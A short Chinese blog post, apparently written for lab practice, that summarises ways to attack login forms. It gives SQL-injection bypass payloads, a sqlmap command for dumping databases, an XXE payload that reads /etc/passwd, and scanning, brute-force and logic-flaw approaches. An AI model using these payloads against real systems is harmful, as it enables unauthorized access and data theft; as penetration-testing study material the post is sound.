登录框渗透思路总结

0x00 前言

最近遇到几个靶机都是登录框,简单写下我的渗透思路吧~~

0x01 渗透思路

1、用户名枚举+爆破

用户名的查找,像工号可以尝试通过互联网搜索引擎去收集

爆破:burp+字典

2、万能密码

测试方法:

(1)用户名输入:‘ or 1=1 or ‘ 密码:任意

(2)Admin’ - -(或‘ or 1=1 or ‘ - -)(admin or 1=1 —) (MS SQL)(直接输入用户名,不进行密码验证)

(3)用户名输入:admin 密码输入:’ or ‘1’=’1 也可以

(4) 用户名输入:admin’ or ‘a’=‘a 密码输入:任意

(5) 用户名输入:‘ or 1=1 - -

(6) 用户名输入:admin‘ or 1=1 - - 密码输入:任意

(7) 用户名输入:1’or’1’=‘1’or’1’=’1 密码输入:任意

3、sql注入

工具测试方法:抓取请求包,用sqlmap扫

sqlmap -u ip --data "username=admin&password=admin" --thread 10 --batch --dbs
4、XXE

抓包查看账号密码是否以xml文件传输。

<?xml version="1.0" encoding="UTF-8"?>
	<!DOCTYPE Quan[
    	<!ENTITY admin SYSTEM "file:///etc/passwd">
	]>
<root><name>&admin;</name><password>admin</password></root>

以及针对目录扫描、端口扫描等方式收集的信息的利用方法

5、目录扫描
  • 目录遍历

  • 敏感文件

    eg:web.config.bak、www.rar、robots.txt

根据文件内容进行对应利用尝试、代码审计。

6、端口扫描

端口扫描得知使用了某个中间件、服务等,查找其相关漏洞。

  • 常见危险端口服务

  • google搜索端口

  • 查询相关漏洞poc

searchsploit
https://www.exploit-db.com/
7、未授权访问/越权

分析扫描、js文件中泄露的接口去尝试利用

工具:JSFinder、supersearch等

eg:/admin/admin.aspx

8、框架漏洞

根据页面报错/icon信息,或者端口扫描得知使用了某个中间件、框架、服务等,查找其相关漏洞。如tp、swagger、struts2、shiro。

  • 常见框架报错页面
  • 常见危险端口服务
9、逻辑漏洞

(1)任意用户注册

如尝试访问register.php等

(2)任意密码重置

(3)短信验证码绕过

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值